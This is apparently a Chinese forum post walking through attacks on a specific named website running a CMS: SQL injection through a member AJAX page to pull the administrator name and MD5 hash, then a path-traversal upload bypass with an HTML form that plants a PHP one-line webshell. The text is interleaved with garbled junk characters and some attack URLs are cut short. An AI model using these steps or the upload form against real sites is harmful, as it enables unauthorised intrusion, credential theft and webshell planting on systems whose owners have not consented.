①注入漏洞。$ Y9 }% L2 z* \
这站 http://www.political-security.com// A2 g# k# Y8 ~" J1 ~
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
" @/ ~7 p0 x3 _3 G8 t1 Ewww.political-security.com/data/mysql_error_trace.inc 爆后台
8 Y" a( J7 \+ q' \' u1 X然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。" L7 p* ~3 Y1 C4 B
然后写上语句 7 k4 Z/ {6 D1 s/ [/ @7 f) ^+ N! F
查看管理员帐号( z4 B$ n& Q) R) K' F
http://www.political-security.co ... &membergroup=@`" ]; y, s* `) w) R
' K ~/ h/ P' F! I! _admin " \2 U" J! \8 j; w
8 K* v A, [& e8 ?1 M$ ~9 K
查看管理员密码
8 @3 K# B c& c# f6 Y3 w http://www.political-security.co ... &membergroup=@`
6 _: @' e, ^. [
+ n2 J a0 h4 y. ^: T _5 b2 r8d29b1ef9f8c5a5af429
- `9 A0 h% P- ?
" z6 S l+ m, `& S! v4 n, u查看管理员密码" P/ @" K2 {" l5 C* U& w
O; Q' n' w; x3 X0 ]2 W
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5: u( D- r. w' z4 _
' ?1 J# v) | W+ g6 C
8d2
" G7 \& X# M* X9 M9b1ef9f8c5a5af42 N1 Q2 U: n7 \2 W+ _
9
: j2 I2 O6 w; v/ S: F. a* J
8 ^+ u( H+ h& @/ |6 Dcmd5没解出来 只好测试第二个方法9 o& |% D3 V) z6 E6 @; G" O
8 D A4 X' h+ S" f
4 x5 p5 m7 i4 y# t- a②上传漏洞:% p+ U+ y# z, K
* G! N; R8 c8 ^
只要登陆会员中心,然后访问页面链接
9 y$ \1 L; c" N# y! j“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”' [8 U5 n o& L0 u4 ^' Q
+ Q% f% ^1 x1 {4 b
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”$ I. F4 z- y! O) n7 v; ?3 c; y& N
2 t+ E9 r& }, d. ?2 G' h) S
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm: p7 `4 W" `1 [ V! j1 ?# d
$ J4 @" `0 ~( L# C; w9 i4 |# j<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
3 r' K9 ^4 y! J" Z; \或者2 ]3 f8 c" P# ?. T
即可上传成功 |